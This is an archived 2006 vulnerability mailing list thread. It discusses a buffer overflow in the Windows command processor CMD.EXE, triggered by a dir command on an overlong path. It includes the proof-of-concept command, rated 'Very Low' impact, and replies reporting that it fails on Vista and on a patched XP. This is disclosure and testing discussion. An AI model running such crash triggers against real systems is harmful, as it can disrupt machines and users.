Vulnerability Development mailing list archives
RE: Windows Command Processor CMD.EXE Buffer Overflow
From: "Marvin Simkin" <Marvin.Simkin () asu edu>
Date: Fri, 20 Oct 2006 15:51:17 -0700
WXPSP2 fully patched:

C:\>ver

Microsoft Windows XP [Version 5.1.2600]

C:\>%COMSPEC% /K "dir \?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The filename or extension is too long.

C:\>

... but then, all the command history is lost; you cannot arrow-up to repeat the command.

-----Original Message-----
From: listbounce () securityfocus com on behalf of Osvaldo Casagrande
Sent: Fri 2006-10-20 04:51
To: gregory_panakkal; vuln-dev () securityfocus com
Subject: RE: Windows Command Processor CMD.EXE Buffer Overflow

It does not work on Windows Vista RC1 (5728)

Osvaldo Casagrande
MCSE, MCT, MVP, Security+
Services Manager
DiviServ S.A.
Running Windows Vista RC1 - Build 5728 and Office 2007 Beta 2 TR

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of gregory_panakkal
Sent: Wednesday, October 18, 2006 11:33 PM
To: vuln-dev () securityfocus com
Subject: Windows Command Processor CMD.EXE Buffer Overflow

Windows Command Processor CMD.EXE Buffer Overflow
Tested on WinXP SP2
Impact - Very Low

Copy-paste the following line in cmd.exe and execute it.. (it is a single command, has been split into multiple lines for readability sake).

%COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

DEP Comes into the picture.

URL : http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html

regards,
Gregory Panakkal
www.infogreg.com

--
gregory_panakkal
gregory_panakkal () fastmail fm